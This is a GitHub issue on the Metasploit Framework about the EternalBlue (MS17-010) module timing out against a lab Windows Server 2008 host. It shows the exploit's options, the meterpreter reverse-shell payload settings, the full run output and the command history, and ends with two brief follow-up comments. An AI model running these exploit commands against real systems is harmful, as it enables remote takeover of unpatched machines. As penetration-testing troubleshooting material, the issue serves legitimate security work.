search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.03k stars 13.94k forks source link

ms17_010_eternalblue Rex::ConnectionTimeout: The connection timed out #14505

Closed faughnn closed 3 years ago

faughnn commented 3 years ago

Steps to reproduce

How'd you do it?

  1. I set the following options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.0.200    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass        kali             no        (Optional) The password for the specified username
   SMBUser        Administrator    no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.15     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
  1. I can ping the server. Firewalls are down. I can netcat the server. I'm at a loss.

Were you following a specific guide/tutorial or reading documentation?

https://www.hackingarticles.in/smb-penetration-testing-port-445/

Expected behavior

What should happen?

Connection should be established

Current behavior

What happens instead?

Timeout

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.0.15:4444 
[*] 192.168.0.200:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.200:445     - Host is likely VULNERABLE to MS17-010! - Windows Server (R) 2008 Standard 6002 Service Pack 2 x64 (64-bit)
[*] 192.168.0.200:445     - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.200:445 - Connecting to target for exploitation.
[+] 192.168.0.200:445 - Connection established for exploitation.
[+] 192.168.0.200:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.200:445 - CORE raw buffer dump (52 bytes)
[*] 192.168.0.200:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
[*] 192.168.0.200:445 - 0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
[*] 192.168.0.200:445 - 0x00000020  20 36 30 30 32 20 53 65 72 76 69 63 65 20 50 61   6002 Service Pa
[*] 192.168.0.200:445 - 0x00000030  63 6b 20 32                                      ck 2            
[+] 192.168.0.200:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.200:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.200:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.200:445 - Starting non-paged pool grooming
[+] 192.168.0.200:445 - Sending SMBv2 buffers
[+] 192.168.0.200:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.200:445 - Sending final SMBv2 buffers.
[*] 192.168.0.200:445 - Sending last fragment of exploit packet!
[*] 192.168.0.200:445 - Receiving response from exploit packet
[+] 192.168.0.200:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.200:445 - Sending egg to corrupted connection.
[*] 192.168.0.200:445 - Triggering free of corrupted buffer.
[-] 192.168.0.200:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.200:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.200:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.0.200:445 - Connecting to target for exploitation.
[-] 192.168.0.200:445 - Rex::ConnectionTimeout: The connection timed out (192.168.0.200:445).
[*] Exploit completed, but no session was created.

Metasploit version

Framework: 6.0.18-dev Console : 6.0.18-dev

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse ``` [framework/ui/console] ActiveModule=exploit/windows/smb/ms17_010_eternalblue [windows/smb/ms17_010_eternalblue] EXITFUNC=thread CheckModule=auxiliary/scanner/smb/smb_ms17_010 WfsDelay=5 WORKSPACE= VERBOSE=false EnableContextEncoding=false ContextInformationFile= DisablePayloadHandler=false RHOSTS=192.168.0.200 RPORT=445 SSL=false SSLVersion=Auto SSLVerifyMode=PEER SSLCipher= Proxies= CPORT= CHOST= ConnectTimeout=10 TCP::max_send_size=0 TCP::send_delay=0 DCERPC::max_frag_size=4096 DCERPC::fake_bind_multi=true DCERPC::fake_bind_multi_prepend=0 DCERPC::fake_bind_multi_append=0 DCERPC::smb_pipeio=rw DCERPC::ReadTimeout=10 VERIFY_TARGET=true VERIFY_ARCH=true SMBUser=Administrator SMBPass=kali SMBDomain=. ForceExploit=false ProcessName=spoolsv.exe MaxExploitAttempts=3 GroomAllocations=12 GroomDelta=5 PAYLOAD=windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.15 LPORT=4444 ReverseListenerBindPort= ReverseAllowProxy=false ReverseListenerComm= ReverseListenerBindAddress= ReverseListenerThreaded=false StagerRetryCount=10 StagerRetryWait=5 PingbackRetries=0 PingbackSleep=30 PayloadUUIDSeed= PayloadUUIDRaw= PayloadUUIDName= PayloadUUIDTracking=false EnableStageEncoding=false StageEncoder= StageEncoderSaveRegisters= StageEncodingFallback=true PrependMigrate=false PrependMigrateProc= AutoLoadStdapi=true AutoVerifySession=true AutoVerifySessionTimeout=30 InitialAutoRunScript= AutoRunScript= AutoSystemInfo=true EnableUnicodeEncoding=false HandlerSSLCert= SessionRetryTotal=3600 SessionRetryWait=10 SessionExpirationTimeout=604800 SessionCommunicationTimeout=300 PayloadProcessCommandLine= AutoUnhookProcess=false smb=pass kali loglevel=3 ```

History

The following commands were ran during the session and before this issue occurred:

Collapse ``` 207 use exploit/windows/smb/ms17_010_eternalblue 208 show options 209 set rhosts 192.168.0.200 210 set smb pass kali 211 set smbpass kali 212 set smbuser Administrator 213 show options 214 run 215 show options 216 version 217 set loglevel 3 218 run 219 debug ```

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse ``` [12/12/2020 13:08:31] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/12/2020 13:08:31] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/12/2020 13:08:31] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/12/2020 13:08:31] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/12/2020 13:13:34] [e(0)] core: Exploit failed (windows/smb/ms17_010_eternalblue): Interrupt - Interrupt [12/12/2020 13:31:13] [e(0)] core: Failed to connect to the database: No database YAML file [12/12/2020 13:31:18] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/12/2020 13:31:18] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/12/2020 13:31:18] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/12/2020 13:31:18] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported ```

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse ``` [12/12/2020 12:47:39] [d(0)] core: SMB version(s) to negotiate: [1] [12/12/2020 12:47:39] [d(0)] core: Negotiated SMB version: SMB1 [12/12/2020 12:49:24] [e(0)] core: Exploit failed (windows/smb/ms17_010_eternalblue) - Msf::NoEncodersSucceededError windows/x64/shell/reverse_tcp: All encoders failed to encode. [12/12/2020 12:49:37] [e(0)] core: Exploit failed (windows/smb/ms17_010_eternalblue) - Msf::NoEncodersSucceededError windows/meterpreter/reverse_tcp: All encoders failed to encode. [12/12/2020 12:49:46] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/12/2020 12:49:46] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/12/2020 12:49:46] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/12/2020 12:49:46] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/12/2020 12:49:54] [e(0)] core: Failed to connect to the database: No database YAML file [12/12/2020 12:49:56] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/12/2020 12:49:56] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/12/2020 12:49:56] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/12/2020 12:49:56] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/12/2020 12:50:31] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/12/2020 12:50:31] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/12/2020 12:50:31] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/12/2020 12:50:31] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/12/2020 12:51:23] [d(0)] core: SMB version(s) to negotiate: [1] [12/12/2020 12:51:23] [d(0)] core: Negotiated SMB version: SMB1 [12/12/2020 12:55:05] [d(0)] core: SMB version(s) to negotiate: [1] [12/12/2020 12:55:05] [d(0)] core: Negotiated SMB version: SMB1 [12/12/2020 12:56:34] [d(0)] core: SMB version(s) to negotiate: [1] [12/12/2020 12:57:36] [d(0)] core: SMB version(s) to negotiate: [1] [12/12/2020 12:57:36] [d(0)] core: Negotiated SMB version: SMB1 [12/12/2020 13:04:56] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/12/2020 13:04:56] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/12/2020 13:04:56] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/12/2020 13:04:56] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/12/2020 13:04:58] [d(0)] core: SMB version(s) to negotiate: [1] [12/12/2020 13:04:58] [d(0)] core: Negotiated SMB version: SMB1 [12/12/2020 13:06:42] [d(0)] core: SMB version(s) to negotiate: [1] [12/12/2020 13:06:42] [d(0)] core: Negotiated SMB version: SMB1 [12/12/2020 13:08:31] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/12/2020 13:08:31] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/12/2020 13:08:31] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/12/2020 13:08:31] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/12/2020 13:11:52] [d(0)] core: SMB version(s) to negotiate: [1] [12/12/2020 13:11:52] [d(0)] core: Negotiated SMB version: SMB1 [12/12/2020 13:13:34] [e(0)] core: Exploit failed (windows/smb/ms17_010_eternalblue): Interrupt - Interrupt [12/12/2020 13:26:39] [d(0)] core: SMB version(s) to negotiate: [1] [12/12/2020 13:26:39] [d(0)] core: Negotiated SMB version: SMB1 [12/12/2020 13:31:13] [e(0)] core: Failed to connect to the database: No database YAML file [12/12/2020 13:31:18] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/12/2020 13:31:18] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/12/2020 13:31:18] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/12/2020 13:31:18] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/12/2020 13:33:47] [d(0)] core: SMB version(s) to negotiate: [1] [12/12/2020 13:33:47] [d(0)] core: Negotiated SMB version: SMB1 [12/12/2020 13:39:24] [d(0)] core: SMB version(s) to negotiate: [1] [12/12/2020 13:39:24] [d(0)] core: Negotiated SMB version: SMB1 ```

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Version/Install

The versions and install method of your Metasploit setup:

Collapse ``` Framework: 6.0.18-dev Ruby: ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [x86_64-linux-gnu] Install Root: /usr/share/metasploit-framework Session Type: postgresql selected, no connection Install Method: Other - Please specify ```
faughnn commented 3 years ago

I see in the logs that I didn't have my db set up

[12/12/2020 13:31:13] [e(0)] core: Failed to connect to the database: No database YAML file

MySQL666xxxxxxxx commented 1 month ago

我也是超时问题